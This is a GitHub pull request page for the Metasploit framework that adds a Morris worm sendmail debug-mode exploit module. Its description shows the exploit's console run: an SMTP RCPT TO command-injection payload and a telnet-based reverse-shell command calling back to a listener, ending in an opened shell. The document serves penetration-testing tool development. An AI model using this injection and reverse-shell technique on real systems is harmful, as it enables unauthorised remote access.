Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Morris worm sendmail debug mode exploit #10836

Merged
merged 8 commits into from
Nov 2, 2018
Merged

Add Morris worm sendmail debug mode exploit #10836

merged 8 commits into from
Nov 2, 2018

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Oct 20, 2018
edited
Loading 

msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   25               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)version.c       5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?

#10700

@wvu wvu added module blocked Blocked by one or more additional tasks feature needs-docs labels Oct 20, 2018
@wvu wvu force-pushed the feature/sendmail branch 5 times, most recently from c83c2b6 to b9c16e7 Compare October 20, 2018 17:50
@wvu wvu force-pushed the feature/sendmail branch 3 times, most recently from 6a75c75 to 5e71699 Compare October 20, 2018 18:52
@wvu wvu removed the needs-docs label Oct 20, 2018
@wvu wvu force-pushed the feature/sendmail branch 3 times, most recently from 7afbd52 to e87c9f5 Compare October 24, 2018 06:28
@wvu wvu changed the title [WIP] Add Morris worm sendmail debug mode exploit Add Morris worm sendmail debug mode exploit Oct 24, 2018
@wvu wvu removed the blocked Blocked by one or more additional tasks label Oct 29, 2018
@busterb busterb self-assigned this Nov 2, 2018
@busterb busterb merged commit 458f635 into rapid7:master Nov 2, 2018
busterb added a commit that referenced this pull request Nov 2, 2018
@busterb
Land #10836, Add Morris worm sendmail debug mode exploit
86469cc
msjenkins-r7 pushed a commit that referenced this pull request Nov 2, 2018
@busterb @msjenkins-r7
Land #10836, Add Morris worm sendmail debug mode exploit
549c835
@busterb
Copy link
Member

busterb commented Nov 2, 2018
edited by gdavidson-r7
Loading

Release Notes

This adds a module exploiting sendmail's well-known historical debug mode to escape to a shell and execute commands in the SMTP RCPT TO command. This vulnerability was exploited by the Morris worm in 1988-11-02.

@wvu wvu deleted the feature/sendmail branch November 2, 2018 17:20
@wvu wvu mentioned this pull request Nov 23, 2018
Merged
@wvu wvu mentioned this pull request Dec 24, 2019
Merged
@wvu wvu mentioned this pull request Jan 29, 2020
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@busterb busterb

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@wvu @busterb @h00die @gdavidson-r7